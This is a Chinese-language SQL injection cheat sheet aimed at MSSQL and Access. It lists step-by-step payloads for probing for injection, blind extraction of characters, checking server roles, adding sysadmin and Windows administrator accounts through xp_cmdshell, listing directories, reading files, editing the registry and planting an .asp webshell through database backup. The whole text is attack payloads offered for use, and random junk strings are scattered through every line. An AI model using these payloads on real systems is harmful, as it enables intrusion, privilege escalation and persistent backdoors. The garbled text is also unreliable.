1.判断是否有注入;and 1=1 ;and 1=2 dK2p7xo
2.初步判断是否是mssql ;and user>0 Ou1JIxZ)|
P:aJ#
3.注入参数是字符'and [查询条件] and ''=' "t_-f7fS7
zOa_X~!@
4.搜索时没过滤参数的'and [查询条件] and '%25'=' V*iH}Y?^p
L G1r]2
5.判断数据库系统 )Hk3A$6(
Hr]h
Jc
;and (select count(*) from sysobjects)>0 mssql IuRmEL_Q_
y10h#&k
;and (select count(*) from msysobjects)>0 access )_i
qAqkS
?Vdia:
52,m:EhL
5wh|=**/
6.猜数据库 ;and (select Count(*) from [数据库名])>0 /(BMG/Tb
dOoK Lry
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 !gv`FE9y
X6mqi;+
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 qQsku;C?i
4@ML3d/
9.(1)猜字段的ascii值(access) frT]5?{
S&\L-@
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 .b-f9qc=
2m35R&
(2)猜字段的ascii值(mssql) g;8jK8Kh
}woo%N P
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 mA*AeP_$
eZdu2.;<
10.测试权限结构(mssql) JZD[N Z<
=<X?sj5
.NvQm]N0.
[vHv0"
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- /Ya_>+oo
NCk r /#!
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- U]vYV
(v}>tb*#`
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- NX/;+{
3+G@g#MY
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 8$ma;U d
(s7;^)}zx
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- lobGj8uxq
75T7+:p
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- B,@c;K
]):<ZsT
;and 1=(select IS_MEMBER('db_owner'));-- C~N/A73gF
%y|)=cm[
{jho&Ai
k'IYA#T6
11.添加mssql和系统的帐户 _;~,Cgfi
I]Dl /
;exec master.dbo.sp_addlogin username;-- F;l$.9? .s
;exec master.dbo.sp_password null,username,password;-- OQ>x5?um
mysetv&5
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Rx);7j/5
nZ@&2YPlem
;exec master.dbo.xp_cmdshell 'net user username password 8&3V#sn'
'&gF>
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- E gal4
`}lJH i
;exec master.dbo.xp_cmdshell 'net user username password /add';-- bBS,-vN
bLQ ^fH4ww
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- I*IhwJFl/
7_mw%|m6@
=RAh|e
ALNc'MW!
12.(1)遍历目录 -Gw$#!
j|/]#@Yr
;create table dirs(paths varchar(100), id int) O km{Xx
5K<5kHpvJ{
;insert dirs exec master.dbo.xp_dirtree 'c:\' ni6{pK4Wqm
zSSB>D
;and (select top 1 paths from dirs)>0 @*Wh
`KK>~T_$J
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1Lg-.-V
y6IXd W
g|<]B$yN#
-x'z
XvWZ
(2)遍历目录 @H7Wb}
'C:>UlzLy
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- %ix)8+Eb
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 }p!HT6 tZ
/u0'
6V
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 5fm?Lxr&?
kIGbG;"_
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 9P~\Mpk
+H9 >A0JF
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 "ajjJ"x A
pDh{Z g6t
8g:;)u4$P
BVr0Gk
13.mssql中的存储过程 GW$.lo1|)
+[R/=$
xp_regenumvalues 注册表根键, 子键 3$m4q`J
1\g6)|R-+
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 P#_sg0oJF
9(5OeH6o?
xp_regread 根键,子键,键值名 F6K4#t+9
qnoNT%xazo
;exec xp_regread s_>
f5/i2
(d<4"!
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 )@L'wW
Wt=|
xp_regwrite 根键,子键, 值名, 值类型, 值 +\|Iu;w
_`I"0.B]
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 59!Fkd3
lK4M.QV
?\
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 t\
7~S&z
g+ MdHn[
xp_regdeletevalue 根键,子键,值名 ]6{*^4kX
W3;#fa:[L
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 @EDs~ lPv
6X\ 2GC9
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 =Apxdnz,
66'?&Xx'
:J:,m
g =2Rqi5
14.mssql的backup创建webshell g*F '[Z."
/-qxS <?o
use model :LQ5u[g$\
]Lm9^q14m
create table cmd(str image); 7yx$Nn`(
,uPJ_oZs
insert into cmd(str) values (''); _^'I
V`RNM%Y
backup database model to disk='c:\l.asp'; #~=hn8
<]T` 3W9
gCN$}
h?f>X"*|(
15.mssql内置函数 MUA%^)#u4Q
wo3wtx
;and (select @@version)>0 获得Windows的版本号 ylB7* >[
$ KRI'4
;and user_name()='dbo' 判断当前系统的连接用户是不是sa y8 KX<2s1
r.T<j.\
;and (select user_name())>0 爆当前系统的连接用户 +]|Z%;im
~O]]N;>72"
;and (select db_name())>0 得到当前连接的数据库 !Mu|mz=
\|U l]1pO8
PNA\ TXT
\T\b NbPn
16.简洁的webshell 2{Chu85
3`#6ACF
use model (lGaPMEU}
6sE{{,OGB
create table cmd(str image); !p[9{U->o;
g(Io/hyj
insert into cmd(str) values (''); #!$GH_
=Me5ftw
backup database model to disk='g:\wwwtest\l.asp';